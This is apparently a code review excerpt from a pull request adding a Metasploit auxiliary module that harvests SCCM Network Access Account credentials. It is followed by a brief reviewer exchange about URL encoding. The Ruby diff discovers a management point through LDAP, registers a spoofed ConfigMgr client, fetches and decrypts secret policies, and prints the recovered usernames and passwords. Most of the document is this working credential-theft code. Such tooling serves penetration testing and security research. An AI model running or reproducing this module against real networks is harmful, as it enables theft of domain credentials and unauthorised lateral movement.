modules/auxiliary/admin/sccm/get_naa_credentials.rb

```diff
@@ -0,0 +1,461 @@
+
+      raw_obj = raw_objects.first
+
+      raw_objects.each do |ro|
+        print_good("Found Management Point: #{ro[:dnshostname].first} (Site code: #{ro[:mssmssitecode].first})")
+      end
+
+      if raw_objects.length > 1
+        print_warning("Found more than one Management Point. Using the first (#{raw_obj[:dnshostname].first})")
+      end
+
+      obj = {}
+      obj[:rhost] = raw_obj[:dnshostname].first
+      obj[:sitecode] = raw_obj[:mssmssitecode].first
+
+      obj
+    rescue Errno::ECONNRESET
+      fail_with(Failure::Disconnected, 'The connection was reset.')
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
+      fail_with(Failure::NoAccess, e.message)
+    rescue Net::LDAP::Error => e
+      fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
+    end
+  end
+
+  def run
+    management_point = datastore['MANAGEMENT_POINT']
+    site_code = datastore['SITE_CODE']
+    if management_point.blank? != site_code.blank?
+      fail_with(Failure::BadConfig, 'Provide both MANAGEMENT_POINT and SITE_CODE, or neither (to perform autodiscovery)')
+    end
+
+    if management_point.blank?
+      begin
+        result = find_management_point
+        fail_with(Failure::NotFound, 'Failed to find management point') unless result
+        management_point = result[:rhost]
+        site_code = result[:site_code]
+      rescue ::IOError => e
+        fail_with(Failure::UnexpectedReply, e.message)
+      end
+    end
+
+    key, cert = generate_key_and_cert('ConfigMgr Client')
+
+    http_opts = {
+      'rhost' => management_point,
+      'rport' => 80,
+      'username' => datastore['COMPUTER_USER'],
+      'password' => datastore['COMPUTER_PASS'],
+      'headers' => {
+        'User-Agent' => 'ConfigMgr Messaging HTTP Sender',
+        'Accept-Encoding' => 'gzip, deflate',
+        'Accept' => '*/*'
+      }
+    }
+
+    sms_id = register_request(http_opts, management_point, key, cert)
+    duration = 5
+    print_status("Waiting #{duration} seconds for SCCM DB to update...")
+
+    sleep(duration)
+
+    secret_urls = get_secret_policies(http_opts, management_point, site_code, key, cert, sms_id)
+    all_results = Set.new
+    secret_urls.each do |url|
+      decrypted_policy = request_policy(http_opts, url, sms_id, key)
+      results = get_creds_from_policy_doc(decrypted_policy)
+      all_results.merge(results)
+    end
+
+    if all_results.length == 0
+      print_status('No NAA credentials configured')
+    end
+
+    all_results.each do |username, password|
+      print_good("Found valid NAA credentials: #{username}:#{password}")
+    end
+  rescue SocketError => e
+    fail_with(Failure::Unreachable, e.message)
+  end
+
+  def request_policy(http_opts, policy_url, sms_id, key)
+    policy_url.gsub!(/^https?:\/\/<mp>/, '')
+    policy_url = policy_url.gsub('{', '%7B').gsub('}', '%7D')
```

Comment:
Can't you rely on Ruby's URL encode functionality here?

Reply:
Sadly no; I tried that initially, but the question mark character needs to be unencoded.

Reply:
shame, but if that's a requirement, so be it, nothing we can do about that.
Thanks for explaining.